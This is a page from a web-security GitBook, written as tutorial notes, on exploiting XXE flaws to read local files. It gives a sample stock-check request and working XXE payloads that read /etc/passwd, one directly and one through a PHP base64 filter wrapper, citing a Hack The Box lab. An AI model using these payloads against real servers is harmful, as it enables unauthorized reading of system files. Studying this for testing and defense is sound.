Passion
  • What is this GitBook about ?
  • Privilege Escalation
    • Linux
    • Windows
  • Network Security
    • Port Scanning
    • DNS Enumeration
    • FTP Enumeration
    • SSH Enumeration
    • SMB Enumeration
    • SMTP Enumeration
    • POP3 Enumeration
  • Checklists
    • Active Directory Security
    • OS Command Injection
    • Buffer Overflow
    • Broken Access Control
    • Local File Inclusion
    • SSRF
    • XXE Attacks
    • SQL Injection
    • XSS
  • WebApp Security
    • Local File Inclusion
    • File Upload Attacks
      • IIS Server File Upload
      • Escaping Sandbox via File Upload
    • Broken Access Control
      • Vertical PrivEsc
      • Horizontal PrivEsc
      • Horizontal => Vertical
    • OS Command Injection
    • SSTI
      • Finding the Injection Point
      • Indentification
      • Exploitation
    • XXE Attacks
      • XXE to LFI
      • XXE to SSRF
      • XXE via File upload
      • XInclude Attacks
      • Blind XXE Attacks
        • Identification
        • Exploitation
        • Blind XXE to LFI
        • Blind XXE by defining Local DTD
    • SQL Injection
    • Server Side Request Forgery
      • Various Attack Methods
      • Exploiting Blind SSRF
    • OAuth Attacks
      • In Password-Based Logins
    • XSS
      • Reflected XSS
      • Stored XSS
      • DOM XSS
      • Blind XSS
      • Perfecting our Payload
      • Exploiting Blind XSS
  • WebApp Mitigations
    • SSTI
  • Docker Security
    • Configuration
    • Ngnix Deployment
  • ☁️Cloud Security
    • AWS
      • Cloud Breach S3
      • IAM PrivEsc - RollBack
      • IAM PrivEsc - Attachment
Powered by GitBook
On this page
  1. WebApp Security
  2. XXE Attacks

XXE to LFI

PreviousXXE AttacksNextXXE to SSRF

Last updated 2 years ago

In order to retrieve data from the server's backend, we'll have to modify the submitted XML into :

  • Add a DOCTYPE element that defines an external entity containing the sensitive file path.

  • Edit the data value in the XML that is returned in the application's response, to make use of the defined external entity.

Suppose a shopping application checks for the stock level of a product by submitting the following XML to the server :

<?xml version="1.0" encoding="UTF-8"?> 
<stockCheck><productId>381</productId></stockCheck>

We can just add a DOCTYPE element to fetch the sensitive file as an external enitity.

<?xml version="1.0" encoding="UTF-8"?> 
<!DOCTYPE d0p [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>
<stockCheck><productId>&xxe;</productId></stockCheck>

The above payload tells us, that &xxe; is an external entity who's value is /etc/passwd file. It uses it within the productID value.

Which makes the backend think that /etc/passwd is also the content of the productID

Payload used <!DOCTYPE d0p [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>.

  • We'll have to place it right after the < xml > tag, and call it in the productID using the & and end it with a ; => &xxe;.

PHP Wrappers - BountyHunter HTB

If suppose a website is built on a php backend, and we found some hidden endpoints such as /db.php, but we cannot access it via the browser then inspect the requests and response through Burp.

<!DOCTYPE replace [<!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=/etc/passwd"> ]>

By this base64 encoding, we get our expected output in the response